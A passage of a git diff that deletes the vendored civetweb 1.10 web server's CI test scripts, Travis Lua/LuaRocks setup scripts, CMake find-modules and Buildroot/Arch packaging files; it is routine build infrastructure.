-    assert.are.equal('Index of', string.match(out, 'Index of'))
-    assert.are.equal('01_basic_test_dir', string.match(out, '01_basic_test_dir'))
-    assert.are.equal('01_basic_test_file', string.match(out, '01_basic_test_file'))
-  end)
-
-end)
diff --git a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_dir/git_keep_empty_dir b/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_dir/git_keep_empty_dir
deleted file mode 100644
index e69de29..0000000
--- a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_dir/git_keep_empty_dir
+++ /dev/null
diff --git a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_file b/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_file
deleted file mode 100644
index e69de29..0000000
--- a/thirdparty/civetweb-1.10/ci/test/01_basic/docroot/01_basic_test_file
+++ /dev/null
diff --git a/thirdparty/civetweb-1.10/ci/test/README.md b/thirdparty/civetweb-1.10/ci/test/README.md
deleted file mode 100644
index fdbecbe..0000000
--- a/thirdparty/civetweb-1.10/ci/test/README.md
+++ /dev/null
@@ -1,34 +0,0 @@
-== Travis CI Tests
-
-Travis is a service which will build your project when you commit or get pull requests on Github.
-
-I have fixed and extended the travis configuration to build on the new sudo-less docker infrastructure.
-
-=== CI Process
-
-* On Check-in or Pull Requests clone the repo
-* Run make WITH_LUA=1 WITH_DEBUG=1 WITH_IPV6=1 WITH_WEBSOCKET=1
-* Build a standalone lua installation (seperate from civetweb or the OS)
-* Build LuaRocks in standalone installation
-* Install a few rocks into the standalone installation
-* Start the test script
-
-=== test/ci_tests/01_basic/basic_spec.lua
-
-On the initial checkin, there is only one test which demonstrates:
-
-* reliably starting civetweb server on travis infrastructure
-* waiting (polling) with lua.socket to establish the server is up and running 
-* using libcurl via lua to test that files in the specified docroot are available
-* kill the civetweb server process
-* waiting (polling) the server port to see that the server has freed it
-
-=== Adding Tests
-
-* Create a directory under ci_tests
-* Add a spec file, so now we have ci_tests/02_my_awesome_test/awesome_spec.lua
-* Any file under ci_tests which ends in _spec.lua will be automatically run
-* Check out the 'busted' and lua-curl3 docs for more info
-* https://github.com/Lua-cURL/Lua-cURLv3
-* http://olivinelabs.com/busted/
-
diff --git a/thirdparty/civetweb-1.10/ci/test/civet.lua b/thirdparty/civetweb-1.10/ci/test/civet.lua
deleted file mode 100644
index 19a6848..0000000
--- a/thirdparty/civetweb-1.10/ci/test/civet.lua
+++ /dev/null
@@ -1,42 +0,0 @@
-socket = require "socket"
-
-local civet = {}
-
--- default params
-civet.port=12345
-civet.max_retry=100
-civet.start_delay=0.1
-
-function civet.start(docroot)
-  -- TODO: use a property
-  docroot = docroot or 'ci/test/01_basic/docroot'
-  assert(io.popen('./civetweb'
-  .. " -listening_ports " .. civet.port
-  .. " -document_root " .. docroot
-  .. " > /dev/null 2>&1 &"
-  ))
-  -- wait until the server answers
-  for i=1,civet.max_retry do
-    local s = socket.connect('127.0.0.1', civet.port)
-    if s then
-      s:close()
-      break
-    end
-    socket.select(nil, nil, civet.start_delay) -- sleep
-  end
-end
-
-function civet.stop()
-  os.execute('killall civetweb')
-  -- wait until the server port closes
-  for i=1,civet.max_retry do
-    local s = socket.connect('127.0.0.1', civet.port)
-    if not s then
-      break
-    end
-    s:close()
-    socket.select(nil, nil, civet.start_delay) -- sleep
-  end
-end
-
-return civet
diff --git a/thirdparty/civetweb-1.10/ci/travis/install_rocks.sh b/thirdparty/civetweb-1.10/ci/travis/install_rocks.sh
deleted file mode 100755
index 739248b..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/install_rocks.sh
+++ /dev/null
@@ -1,14 +0,0 @@
-#!/usr/bin/env bash
-set -ev
-
-source ci/travis/lua_env.sh
-
-# add any rocks required for ci_tests to this list
-# lua-curl depends on a libcurl development package (i.e. libcurl4-openssl-dev)
-ROCKS=(lua-curl busted)
-
-for ROCK in ${ROCKS[*]}
-do
-  $LUAROCKS install $ROCK
-done
-
diff --git a/thirdparty/civetweb-1.10/ci/travis/lua_env.sh b/thirdparty/civetweb-1.10/ci/travis/lua_env.sh
deleted file mode 100755
index dd742e9..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/lua_env.sh
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/usr/bin/env bash
-
-LUAROCKS=ci/lua/bin/luarocks
-eval $($LUAROCKS path --bin)
-
diff --git a/thirdparty/civetweb-1.10/ci/travis/platform.sh b/thirdparty/civetweb-1.10/ci/travis/platform.sh
deleted file mode 100755
index 4a3af0d..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/platform.sh
+++ /dev/null
@@ -1,15 +0,0 @@
-if [ -z "$PLATFORM" ]; then
-  PLATFORM=$TRAVIS_OS_NAME;
-fi
-
-if [ "$PLATFORM" == "osx" ]; then
-  PLATFORM="macosx";
-fi
-
-if [ -z "$PLATFORM" ]; then
-  if [ "$(uname)" == "Linux" ]; then
-    PLATFORM="linux";
-  else
-    PLATFORM="macosx";
-  fi;
-fi
diff --git a/thirdparty/civetweb-1.10/ci/travis/run_ci_tests.sh b/thirdparty/civetweb-1.10/ci/travis/run_ci_tests.sh
deleted file mode 100755
index 16c2cc0..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/run_ci_tests.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-#!/usr/bin/env bash
-set -ev
-
-source ci/travis/lua_env.sh
-busted -o TAP ci/test/
-
-
diff --git a/thirdparty/civetweb-1.10/ci/travis/setup_lua.sh b/thirdparty/civetweb-1.10/ci/travis/setup_lua.sh
deleted file mode 100755
index 8e1b324..0000000
--- a/thirdparty/civetweb-1.10/ci/travis/setup_lua.sh
+++ /dev/null
@@ -1,61 +0,0 @@
-#!/usr/bin/env /bash
-set -ev
-
-# this script installs a lua / luarocks environment in .travis/lua
-# this is necessary because travis docker architecture (the fast way)
-# does not permit sudo, and does not contain a useful lua installation
-
-# After this script is finished, you can configure your environment to
-# use it by sourcing lua_env.sh
-
-source ci/travis/platform.sh
-
-# The current versions when this script was written
-LUA_VERSION=5.2.4
-LUAROCKS_VERSION=2.2.2
-
-# directory where this script is located
-SCRIPT_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
-
-# civetweb base dir
-PROJECT_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )"/../.. && pwd )
-
-# fetch and unpack lua src
-cd $SCRIPT_DIR
-LUA_BASE=lua-$LUA_VERSION
-rm -rf $LUA_BASE
-curl http://www.lua.org/ftp/$LUA_BASE.tar.gz | tar zx
-
-# build lua
-cd $LUA_BASE
-make $PLATFORM
-make local
-
-# mv built lua install to target Lua dir
-LUA_DIR=$PROJECT_DIR/ci/lua
-rm -rf $LUA_DIR
-mv $SCRIPT_DIR/$LUA_BASE/install $LUA_DIR
-
-# add to path required by luarocks installer
-export PATH=$LUA_DIR/bin:$PATH
-
-
-# fetch and unpack luarocks
-cd $SCRIPT_DIR
-LUAROCKS_BASE=luarocks-$LUAROCKS_VERSION
-rm -rf ${LUAROCKS_BASE}
-LUAROCKS_URL=http://luarocks.org/releases/${LUAROCKS_BASE}.tar.gz
-# -L because it's a 302 redirect
-curl -L $LUAROCKS_URL | tar xzp
-cd $LUAROCKS_BASE
-
-# build luarocks
-./configure --prefix=$LUA_DIR
-make build
-make install
-
-# cleanup source dirs
-cd $SCRIPT_DIR
-rm -rf $LUAROCKS_BASE
-rm -rf $LUA_BASE
-
diff --git a/thirdparty/civetweb-1.10/cmake/AddCCompilerFlag.cmake b/thirdparty/civetweb-1.10/cmake/AddCCompilerFlag.cmake
deleted file mode 100644
index f5550fa..0000000
--- a/thirdparty/civetweb-1.10/cmake/AddCCompilerFlag.cmake
+++ /dev/null
@@ -1,38 +0,0 @@
-# - Adds a compiler flag if it is supported by the compiler
-#
-# This function checks that the supplied compiler flag is supported and then
-# adds it to the corresponding compiler flags
-#
-#  add_c_compiler_flag(<FLAG> [<VARIANT>])
-#
-# - Example
-#
-# include(AddCCompilerFlag)
-# add_c_compiler_flag(-Wall)
-# add_c_compiler_flag(-no-strict-aliasing RELEASE)
-# Requires CMake 2.6+
-
-if(__add_c_compiler_flag)
-  return()
-endif()
-set(__add_c_compiler_flag INCLUDED)
-
-include(CheckCCompilerFlag)
-
-function(add_c_compiler_flag FLAG)
-  string(TOUPPER "HAVE_C_FLAG_${FLAG}" SANITIZED_FLAG)
-  string(REPLACE "+" "X" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "[^A-Za-z_0-9]" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "_+" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  set(CMAKE_REQUIRED_FLAGS "${FLAG}")
-  check_c_compiler_flag("" ${SANITIZED_FLAG})
-  if(${SANITIZED_FLAG})
-    set(VARIANT ${ARGV1})
-    if(ARGV1)
-      string(REGEX REPLACE "[^A-Za-z_0-9]" "_" VARIANT "${VARIANT}")
-      string(TOUPPER "_${VARIANT}" VARIANT)
-    endif()
-    set(CMAKE_C_FLAGS${VARIANT} "${CMAKE_C_FLAGS${VARIANT}} ${FLAG}" PARENT_SCOPE)
-  endif()
-endfunction()
-
diff --git a/thirdparty/civetweb-1.10/cmake/AddCXXCompilerFlag.cmake b/thirdparty/civetweb-1.10/cmake/AddCXXCompilerFlag.cmake
deleted file mode 100644
index 5e58c6d..0000000
--- a/thirdparty/civetweb-1.10/cmake/AddCXXCompilerFlag.cmake
+++ /dev/null
@@ -1,38 +0,0 @@
-# - Adds a compiler flag if it is supported by the compiler
-#
-# This function checks that the supplied compiler flag is supported and then
-# adds it to the corresponding compiler flags
-#
-#  add_cxx_compiler_flag(<FLAG> [<VARIANT>])
-#
-# - Example
-#
-# include(AddCXXCompilerFlag)
-# add_cxx_compiler_flag(-Wall)
-# add_cxx_compiler_flag(-no-strict-aliasing RELEASE)
-# Requires CMake 2.6+
-
-if(__add_cxx_compiler_flag)
-  return()
-endif()
-set(__add_cxx_compiler_flag INCLUDED)
-
-include(CheckCXXCompilerFlag)
-
-function(add_cxx_compiler_flag FLAG)
-  string(TOUPPER "HAVE_CXX_FLAG_${FLAG}" SANITIZED_FLAG)
-  string(REPLACE "+" "X" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "[^A-Za-z_0-9]" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  string(REGEX REPLACE "_+" "_" SANITIZED_FLAG ${SANITIZED_FLAG})
-  set(CMAKE_REQUIRED_FLAGS "${FLAG}")
-  check_cxx_compiler_flag("" ${SANITIZED_FLAG})
-  if(${SANITIZED_FLAG})
-    set(VARIANT ${ARGV1})
-    if(ARGV1)
-      string(REGEX REPLACE "[^A-Za-z_0-9]" "_" VARIANT "${VARIANT}")
-      string(TOUPPER "_${VARIANT}" VARIANT)
-    endif()
-    set(CMAKE_CXX_FLAGS${VARIANT} "${CMAKE_CXX_FLAGS${VARIANT}} ${FLAG}" PARENT_SCOPE)
-  endif()
-endfunction()
-
diff --git a/thirdparty/civetweb-1.10/cmake/DetermineTargetArchitecture.cmake b/thirdparty/civetweb-1.10/cmake/DetermineTargetArchitecture.cmake
deleted file mode 100644
index 7d18213..0000000
--- a/thirdparty/civetweb-1.10/cmake/DetermineTargetArchitecture.cmake
+++ /dev/null
@@ -1,47 +0,0 @@
-# - Determines the target architecture of the compilation
-#
-# This function checks the architecture that will be built by the compiler
-# and sets a variable to the architecture
-#
-#  determine_target_architecture(<OUTPUT_VAR>)
-#
-# - Example
-#
-# include(DetermineTargetArchitecture)
-# determine_target_architecture(PROJECT_NAME_ARCHITECTURE)
-
-if(__determine_target_architecture)
-  return()
-endif()
-set(__determine_target_architecture INCLUDED)
-
-function(determine_target_architecture FLAG)
-  if (MSVC)
-    if("${MSVC_C_ARCHITECTURE_ID}" STREQUAL "X86")
-      set(ARCH "i686")
-    elseif("${MSVC_C_ARCHITECTURE_ID}" STREQUAL "x64")
-      set(ARCH "x86_64")
-    elseif("${MSVC_C_ARCHITECTURE_ID}" STREQUAL "ARM")
-      set(ARCH "arm")
-    else()
-      message(FATAL_ERROR "Failed to determine the MSVC target architecture: ${MSVC_C_ARCHITECTURE_ID}")
-    endif()
-  else()
-    execute_process(
-      COMMAND ${CMAKE_C_COMPILER} -dumpmachine
-      RESULT_VARIABLE RESULT
-      OUTPUT_VARIABLE ARCH
-      ERROR_QUIET
-    )
-    if (RESULT)
-      message(FATAL_ERROR "Failed to determine target architecture triplet: ${RESULT}")
-    endif()
-    string(REGEX MATCH "([^-]+).*" ARCH_MATCH ${ARCH})
-    if (NOT CMAKE_MATCH_1 OR NOT ARCH_MATCH)
-      message(FATAL_ERROR "Failed to match the target architecture triplet: ${ARCH}")
-    endif()
-    set(ARCH ${CMAKE_MATCH_1})
-  endif()
-  message(STATUS "Target architecture - ${ARCH}")
-  set(FLAG ${ARCH} PARENT_SCOPE)
-endfunction()
diff --git a/thirdparty/civetweb-1.10/cmake/FindLibDl.cmake b/thirdparty/civetweb-1.10/cmake/FindLibDl.cmake
deleted file mode 100644
index c018d92..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindLibDl.cmake
+++ /dev/null
@@ -1,46 +0,0 @@
-#.rst:
-# FindLibDl
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``LIBDL::LIBDL``, if
-# LIBDL has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   LIBDL_INCLUDE_DIRS  - where to find dlfcn.h, etc.
-#   LIBDL_LIBRARIES     - List of libraries when using libdl.
-#   LIBDL_FOUND         - True if dynamic linking library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``LIBDL_ROOT`` to a library installation root to tell this
-# module where to look.
-
-find_path(LIBDL_INCLUDE_DIRS
-  NAMES dlfcn.h
-  PATHS ${LIBDL_ROOT}/include/
-)
-find_library(LIBDL_LIBRARIES dl)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(LibDl DEFAULT_MSG LIBDL_LIBRARIES LIBDL_INCLUDE_DIRS)
-mark_as_advanced(LIBDL_INCLUDE_DIRS LIBDL_LIBRARIES)
-
-if(LIBDL_FOUND)
-    if(NOT TARGET LIBDL::LIBDL)
-      add_library(LIBDL::LIBDL UNKNOWN IMPORTED)
-      set_target_properties(LIBDL::LIBDL PROPERTIES
-        IMPORTED_LOCATION "${LIBDL_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${LIBDL_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/FindLibM.cmake b/thirdparty/civetweb-1.10/cmake/FindLibM.cmake
deleted file mode 100644
index 9f42aa4..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindLibM.cmake
+++ /dev/null
@@ -1,47 +0,0 @@
-#.rst:
-# FindLibM
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``LIBM::LIBM``, if
-# LIBM has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   LIBM_INCLUDE_DIRS  - where to find math.h, etc.
-#   LIBM_LIBRARIES     - List of libraries when using libm.
-#   LIBM_FOUND         - True if math library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``LIBM_ROOT`` to a math library installation root to tell this
-# module where to look.
-
-find_path(LIBM_INCLUDE_DIRS
-  NAMES math.h
-  PATHS /usr/include /usr/local/include /usr/local/bic/include
-  NO_DEFAULT_PATH
-)
-find_library(LIBM_LIBRARIES m)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(LibM DEFAULT_MSG LIBM_LIBRARIES LIBM_INCLUDE_DIRS)
-mark_as_advanced(LIBM_INCLUDE_DIRS LIBM_LIBRARIES)
-
-if(LIBM_FOUND)
-    if(NOT TARGET LIBM::LIBM)
-      add_library(LIBM::LIBM UNKNOWN IMPORTED)
-      set_target_properties(LIBM::LIBM PROPERTIES
-        IMPORTED_LOCATION "${LIBM_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${LIBM_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/FindLibRt.cmake b/thirdparty/civetweb-1.10/cmake/FindLibRt.cmake
deleted file mode 100644
index c496edf..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindLibRt.cmake
+++ /dev/null
@@ -1,46 +0,0 @@
-#.rst:
-# FindLibRt
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``LIBRT::LIBRT``, if
-# LIBRT has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   LIBRT_INCLUDE_DIRS  - where to find time.h, etc.
-#   LIBRT_LIBRARIES     - List of libraries when using librt.
-#   LIBRT_FOUND         - True if realtime library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``LIBRT_ROOT`` to a realtime installation root to tell this
-# module where to look.
-
-find_path(LIBRT_INCLUDE_DIRS
-  NAMES time.h
-  PATHS ${LIBRT_ROOT}/include/
-)
-find_library(LIBRT_LIBRARIES rt)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(LibRt DEFAULT_MSG LIBRT_LIBRARIES LIBRT_INCLUDE_DIRS)
-mark_as_advanced(LIBRT_INCLUDE_DIRS LIBRT_LIBRARIES)
-
-if(LIBRT_FOUND)
-    if(NOT TARGET LIBRT::LIBRT)
-      add_library(LIBRT::LIBRT UNKNOWN IMPORTED)
-      set_target_properties(LIBRT::LIBRT PROPERTIES
-        IMPORTED_LOCATION "${LIBRT_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${LIBRT_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/FindWinSock.cmake b/thirdparty/civetweb-1.10/cmake/FindWinSock.cmake
deleted file mode 100644
index 0bf355d..0000000
--- a/thirdparty/civetweb-1.10/cmake/FindWinSock.cmake
+++ /dev/null
@@ -1,102 +0,0 @@
-#.rst:
-# FindWinSock
-# --------
-#
-# Find the native realtime includes and library.
-#
-# IMPORTED Targets
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines :prop_tgt:`IMPORTED` target ``WINSOCK::WINSOCK``, if
-# WINSOCK has been found.
-#
-# Result Variables
-# ^^^^^^^^^^^^^^^^
-#
-# This module defines the following variables:
-#
-# ::
-#
-#   WINSOCK_INCLUDE_DIRS  - where to find winsock.h, etc.
-#   WINSOCK_LIBRARIES     - List of libraries when using librt.
-#   WINSOCK_FOUND         - True if realtime library found.
-#
-# Hints
-# ^^^^^
-#
-# A user may set ``WINSOCK_ROOT`` to a realtime installation root to tell this
-# module where to look.
-
-macro(REMOVE_DUPLICATE_PATHS LIST_VAR)
-  set(WINSOCK_LIST "")
-  foreach(PATH IN LISTS ${LIST_VAR})
-    get_filename_component(PATH "${PATH}" REALPATH)
-    list(APPEND WINSOCK_LIST "${PATH}")
-  endforeach(PATH)
-  set(${LIST_VAR} ${WINSOCK_LIST})
-  list(REMOVE_DUPLICATES ${LIST_VAR})
-endmacro(REMOVE_DUPLICATE_PATHS)
-
-set(WINSOCK_INCLUDE_PATHS "${WINSOCK_ROOT}/include/")
-if(MINGW)
-  execute_process(
-    COMMAND ${CMAKE_C_COMPILER} -xc -E -v -
-    RESULT_VARIABLE RESULT
-    INPUT_FILE nul
-    ERROR_VARIABLE ERR
-    OUTPUT_QUIET
-  )
-  if (NOT RESULT)
-    string(FIND "${ERR}" "#include <...> search starts here:" START)
-    string(FIND "${ERR}" "End of search list." END)
-    if (NOT ${START} EQUAL -1 AND NOT ${END} EQUAL -1)
-      math(EXPR START "${START} + 36")
-      math(EXPR END "${END} - 1")
-      math(EXPR LENGTH "${END} - ${START}")
-      string(SUBSTRING "${ERR}" ${START} ${LENGTH} WINSOCK_INCLUDE_PATHS)
-      string(REPLACE "\n " ";" WINSOCK_INCLUDE_PATHS "${WINSOCK_INCLUDE_PATHS}")
-      list(REVERSE WINSOCK_INCLUDE_PATHS)
-    endif()
-  endif()
-endif()
-remove_duplicate_paths(WINSOCK_INCLUDE_PATHS)
-
-set(WINSOCK_LIBRARY_PATHS "${WINSOCK_ROOT}/lib/")
-if(MINGW)
-  execute_process(
-    COMMAND ${CMAKE_C_COMPILER} -print-search-dirs
-    RESULT_VARIABLE RESULT
-    OUTPUT_VARIABLE OUT
-    ERROR_QUIET
-  )
-  if (NOT RESULT)
-    string(REGEX MATCH "libraries: =([^\r\n]*)" OUT "${OUT}")
-    list(APPEND WINSOCK_LIBRARY_PATHS "${CMAKE_MATCH_1}")
-  endif()
-endif()
-if (${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "AMD64" AND ${CMAKE_SIZEOF_VOID_P} EQUAL 4)
-  list(APPEND WINSOCK_LIBRARY_PATHS "C:/Windows/SysWOW64")
-endif()
-list(APPEND WINSOCK_LIBRARY_PATHS "C:/Windows/System32")
-remove_duplicate_paths(WINSOCK_LIBRARY_PATHS)
-
-find_path(WINSOCK_INCLUDE_DIRS
-  NAMES winsock2.h
-  PATHS ${WINSOCK_INCLUDE_PATHS}
-)
-find_library(WINSOCK_LIBRARIES ws2_32
-  PATHS ${WINSOCK_LIBRARY_PATHS}
-  NO_DEFAULT_PATH
-)
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(WinSock DEFAULT_MSG WINSOCK_LIBRARIES WINSOCK_INCLUDE_DIRS)
-mark_as_advanced(WINSOCK_INCLUDE_DIRS WINSOCK_LIBRARIES)
-
-if(WINSOCK_FOUND)
-    if(NOT TARGET WINSOCK::WINSOCK)
-      add_library(WINSOCK::WINSOCK UNKNOWN IMPORTED)
-      set_target_properties(WINSOCK::WINSOCK PROPERTIES
-        IMPORTED_LOCATION "${WINSOCK_LIBRARIES}"
-        INTERFACE_INCLUDE_DIRECTORIES "${WINSOCK_INCLUDE_DIRS}")
-    endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch b/thirdparty/civetweb-1.10/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch
deleted file mode 100644
index e16ea1f..0000000
--- a/thirdparty/civetweb-1.10/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From c82fe8888aacfe784476112edd3878256d2e30bc Mon Sep 17 00:00:00 2001
-From: Joshua Boyd <jdboyd@Joshua-Boyds-Mac-mini.local>
-Date: Wed, 23 Mar 2016 17:54:41 -0400
-Subject: [PATCH] Detect missing itimerspec on OSX.
-
-Set define to compiler accordingly.
-
-This fixes cmake on osx support.
----
- CMakeLists.txt | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/CMakeLists.txt b/CMakeLists.txt
-index e271e31..1d413e8 100644
---- a/CMakeLists.txt
-+++ b/CMakeLists.txt
-@@ -193,6 +193,14 @@ if(NOT HAVE_SYS_TIME_H)
-     endif(MSVC)
- endif(NOT HAVE_SYS_TIME_H)
- 
-+# OSX has sys/time.h, but it still lacks itimerspec
-+if(HAVE_SYS_TIME_H)
-+    check_struct_member("struct itimerspec" it_value "sys/time.h" HAVE_STRUCT_ITIMERSPEC_IT_VALUE)
-+    if(NOT HAVE_STRUCT_ITIMERSPEC_IT_VALUE)
-+        add_definitions(-DSTRUCT_ITIMERSPEC_DEFINITION_MISSING=1)
-+        set(STRUCT_ITIMERSPEC_DEFINITION_MISSING 1)
-+    endif(NOT HAVE_STRUCT_ITIMERSPEC_IT_VALUE)
-+endif(HAVE_SYS_TIME_H)
- 
- ###############################################################################
- # Check for integer types
diff --git a/thirdparty/civetweb-1.10/cmake/check/patch.cmake b/thirdparty/civetweb-1.10/cmake/check/patch.cmake
deleted file mode 100644
index 472d392..0000000
--- a/thirdparty/civetweb-1.10/cmake/check/patch.cmake
+++ /dev/null
@@ -1,12 +0,0 @@
-message(STATUS "Patching check ${VERSION} ${SOURCE_DIR}")
-
-# Patch checks for MinGW
-# https://sourceforge.net/p/check/patches/53/
-set(CMAKE_LISTS_LOCATION "${SOURCE_DIR}/CMakeLists.txt")
-file(READ ${CMAKE_LISTS_LOCATION} CMAKE_LISTS)
-string(REGEX REPLACE
-  "(check_type_size\\((clock|clockid|timer)_t [A-Z_]+\\)[\r\n]+[^\r\n]+[\r\n]+[^\r\n]+[\r\n]+endif\\(NOT HAVE[A-Z_]+\\))"
-  "set(CMAKE_EXTRA_INCLUDE_FILES time.h)\n\\1\nunset(CMAKE_EXTRA_INCLUDE_FILES)"
-  CMAKE_LISTS "${CMAKE_LISTS}")
-file(WRITE ${CMAKE_LISTS_LOCATION} "${CMAKE_LISTS}")
-message(STATUS "Patched ${CMAKE_LISTS_LOCATION}")
diff --git a/thirdparty/civetweb-1.10/contrib/buildroot/Config.in b/thirdparty/civetweb-1.10/contrib/buildroot/Config.in
deleted file mode 100644
index 2334fdf..0000000
--- a/thirdparty/civetweb-1.10/contrib/buildroot/Config.in
+++ /dev/null
@@ -1,26 +0,0 @@
-config BR2_PACKAGE_CIVETWEB
-	bool "civetweb"
-	depends on BR2_TOOLCHAIN_HAS_THREADS
-	help
-	  Full featured embedded web server with Lua support.
-	  
-	  https://sourceforge.net/projects/civetweb
-
-if BR2_PACKAGE_CIVETWEB
-
-config BR2_CIVETWEB_WITH_LUA
-	bool "enable Lua support"
-	# required by the bundled Sqlite3 and Lua code
-	depends on BR2_LARGEFILE
-	help
-	  Enable Lua support in Civetweb. Note that this will use a
-	  version of Lua and Sqlite bundled within the Civetweb
-	  sources, and not the packages from Buildroot.
-
-comment "Lua support requires largefile support in toolchain"
-	depends on !BR2_LARGEFILE
-
-endif
-
-comment "civetweb requires a toolchain with PTHREAD support"
-	depends on !BR2_TOOLCHAIN_HAS_THREADS
diff --git a/thirdparty/civetweb-1.10/contrib/buildroot/civetweb.mk b/thirdparty/civetweb-1.10/contrib/buildroot/civetweb.mk
deleted file mode 100644
index 8b9b7de..0000000
--- a/thirdparty/civetweb-1.10/contrib/buildroot/civetweb.mk
+++ /dev/null
@@ -1,55 +0,0 @@
-################################################################################
-#
-# civetweb
-#
-################################################################################
-
-CIVETWEB_VERSION = 1.10
-CIVETWEB_SITE = http://github.com/civetweb/civetweb/tarball/v$(CIVETWEB_VERSION)
-CIVETWEB_LICENSE = MIT
-CIVETWEB_LICENSE_FILES = LICENSE.md
-
-CIVETWEB_CONF_OPT = TARGET_OS=LINUX
-CIVETWEB_COPT = $(TARGET_CFLAGS) -DHAVE_POSIX_FALLOCATE=0
-CIVETWEB_LDFLAGS = $(TARGET_LDFLAGS)
-CIVETWEB_SYSCONFDIR = /etc
-CIVETWEB_HTMLDIR = /var/www
-
-ifneq ($(BR2_LARGEFILE),y)
-	CIVETWEB_COPT += -DSQLITE_DISABLE_LFS
-endif
-
-ifeq ($(BR2_INET_IPV6),y)
-	CIVETWEB_CONF_OPT += WITH_IPV6=1
-endif
-
-ifeq ($(BR2_CIVETWEB_WITH_LUA),y)
-	CIVETWEB_CONF_OPT += WITH_LUA=1
-endif
-
-ifeq ($(BR2_PACKAGE_OPENSSL),y)
-	CIVETWEB_COPT += -DNO_SSL_DL -lcrypt -lssl
-	CIVETWEB_DEPENDENCIES += openssl
-else
-	CIVETWEB_COPT += -DNO_SSL
-endif
-
-define CIVETWEB_BUILD_CMDS
-	$(MAKE) CC="$(TARGET_CC)" -C $(@D) build \
-		$(CIVETWEB_CONF_OPT) \
-		COPT="$(CIVETWEB_COPT)"
-endef
-
-define CIVETWEB_INSTALL_TARGET_CMDS
-	$(MAKE) CC="$(TARGET_CC)" -C $(@D) install \
-		DOCUMENT_ROOT="$(CIVETWEB_HTMLDIR)" \
-		CONFIG_FILE2="$(CIVETWEB_SYSCONFDIR)/civetweb.conf" \
-		HTMLDIR="$(TARGET_DIR)$(CIVETWEB_HTMLDIR)" \
-		SYSCONFDIR="$(TARGET_DIR)$(CIVETWEB_SYSCONFDIR)" \
-		PREFIX="$(TARGET_DIR)/usr" \
-		$(CIVETWEB_CONF_OPT) \
-		COPT='$(CIVETWEB_COPT)'
-endef
-
-$(eval $(generic-package))
-
diff --git a/thirdparty/civetweb-1.10/distribution/arch/PKGBUILD.git.example b/thirdparty/civetweb-1.10/distribution/arch/PKGBUILD.git.example
deleted file mode 100644
index 7102bcb..0000000
--- a/thirdparty/civetweb-1.10/distribution/arch/PKGBUILD.git.example
+++ /dev/null
@@ -1,42 +0,0 @@
-# An example PKGBUILD script for Civetweb upstream, git version
-# Rename to PKGBUILD to build via makepkg
-_pkgname=civetweb
-pkgname=$_pkgname-git
-pkgver=v1.4.24.g73c40b6
-pkgrel=1
-pkgdesc="Small and quick-to-use web server; https/php/cgi support; MIT license - git development version"
-arch=('i686' 'x86_64')
-url="http://sourceforge.net/p/civetweb/"
-license=('MIT')
-groups=()
-depends=()
-makedepends=('git sed')
-optdepends=('php-cgi: for php support')
-provides=("$_pkgname")
-conflicts=("$_pkgname")
-backup=("etc/$_pkgname/$_pkgname.conf")
-source=("$_pkgname::git+https://github.com/civetweb/civetweb.git")
-md5sums=('SKIP')
-
-pkgver() {
-  cd "$srcdir/$_pkgname"
-  git describe --tags | sed 's|-|.|g'
-}
-
-build() {
